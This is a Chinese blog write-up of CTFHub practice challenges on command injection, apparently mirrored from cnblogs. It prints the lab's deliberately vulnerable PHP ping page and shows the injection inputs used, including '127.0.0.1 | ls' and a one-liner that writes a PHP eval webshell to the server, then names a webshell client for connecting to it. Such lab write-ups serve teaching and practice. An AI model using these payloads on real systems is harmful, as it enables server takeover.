zoukankan      html  css  js  c++  java
  • CTFHub web技能树之RCE初步 命令注入+过滤cat

    在一个大佬的突然丢了个题过来,于是去玩了玩rce的两道题

     大佬的博客跳转链接在此-》》》大佬召唤机

    命令注入

    一上来就是源码出现,上面有个ping的地方

    <?php
    
    $res = FALSE;
    
    if (isset($_GET['ip']) && $_GET['ip']) {
        $cmd = "ping -c 4 {$_GET['ip']}";
        exec($cmd, $res);
    }
    
    ?>
    
    <!DOCTYPE html>
    <html>
    <head>
        <title>CTFHub 命令注入-无过滤</title>
    </head>
    <body>
    
    <h1>CTFHub 命令注入-无过滤</h1>
    
    <form action="#" method="GET">
        <label for="ip">IP : </label><br>
        <input type="text" id="ip" name="ip">
        <input type="submit" value="Ping">
    </form>
    
    <hr>
    
    <pre>
    <?php
    if ($res) {
        print_r($res);
    }
    ?>
    </pre>
    
    <?php
    show_source(__FILE__);
    ?>
    
    </body>
    </html>
    View Code

    先ping 本地

    然后好像没啥

    然后试试管道命令

    127.0.0.1 | ls

    然后试着去尝试cat,发现貌似被屏蔽了

    惨兮兮

    然后大佬悠悠的说了一句,一句话,撸到底

    127.0.0.1 & echo "<?php @eval(@@$_POST['a']);?>" > 3.php
    

      

    记得转译后面的 $(把两个at at去掉(post

    之前的))

    然后一把菜刀直接丢过去,大佬给的Java版本的菜刀真好用

     

     

    过滤cat那道题也是一样的方式可以

     

     

  • 相关阅读:
    快速读取数字
    std:ios:sync_with_stdio (false)以及局限性
    差分,差分数组
    归并排序
    2020-07-06日报博客
    OAuth2-授权码模式 登录流程
    OAuth2 简介
    SpringSecurity连接数据库
    SpringSecurity中的授权
    SpringSecurity 入门
  • 原文地址:https://www.cnblogs.com/JeffKing11/p/12416178.html
Copyright © 2011-2022 走看看